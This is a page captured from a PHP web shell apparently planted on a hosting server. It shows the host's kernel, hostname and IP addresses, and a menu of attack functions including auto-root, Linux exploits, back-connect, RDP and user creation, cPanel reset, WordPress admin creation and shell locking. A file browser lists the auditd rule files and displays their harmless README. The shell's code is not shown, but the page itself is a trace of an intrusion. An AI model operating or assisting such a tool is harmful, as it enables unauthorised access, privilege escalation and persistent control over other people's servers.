Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.171.136
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
audit-2.8.5 /
rules /
[ HOME SHELL ]
Name
Size
Permission
Action
10-base-config.rules
163
B
-rw-r--r--
10-no-audit.rules
284
B
-rw-r--r--
11-loginuid.rules
93
B
-rw-r--r--
12-cont-fail.rules
329
B
-rw-r--r--
12-ignore-error.rules
323
B
-rw-r--r--
20-dont-audit.rules
516
B
-rw-r--r--
21-no32bit.rules
273
B
-rw-r--r--
22-ignore-chrony.rules
252
B
-rw-r--r--
23-ignore-filesystems.rules
506
B
-rw-r--r--
30-nispom.rules
4.8
KB
-rw-r--r--
30-ospp-v42.rules
10.15
KB
-rw-r--r--
30-pci-dss-v31.rules
5.81
KB
-rw-r--r--
30-stig.rules
6.44
KB
-rw-r--r--
31-privileged.rules
1.42
KB
-rw-r--r--
32-power-abuse.rules
213
B
-rw-r--r--
40-local.rules
156
B
-rw-r--r--
41-containers.rules
439
B
-rw-r--r--
42-injection.rules
672
B
-rw-r--r--
43-module-load.rules
398
B
-rw-r--r--
70-einval.rules
326
B
-rw-r--r--
71-networking.rules
151
B
-rw-r--r--
99-finalize.rules
86
B
-rw-r--r--
README-rules
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README-rules
This group of rules are meant to be used with the augenrules program. The augenrules program expects rules to be located in /etc/audit/rules.d/ The rules will get processed in a specific order based on their natural sort order. To make things easier to use, the files in this directory are organized into groups with the following meanings: 10 - Kernel and auditctl configuration 20 - Rules that could match general rules but we want a different match 30 - Main rules 40 - Optional rules 50 - Server Specific rules 70 - System local rules 90 - Finalize (immutable) There is one set of rules, 31-privileged.rules, that should be regenerated. There is a script in the comments of that file. You can uncomment the commands and run the script and then rename the resulting file. The rules are not meant to be used all at once. They are pieces of a policy that should be thought out and individual files copied to /etc/audit/rules.d/ For example, if you wanted to set a system up in the STIG configuration, copy rules 10-base-config, 30-stig, 31-privileged, and 99-finalize. You can add more if you like. Once you have the rules in the rules.d directory, you can load then by running augenrules --load
Close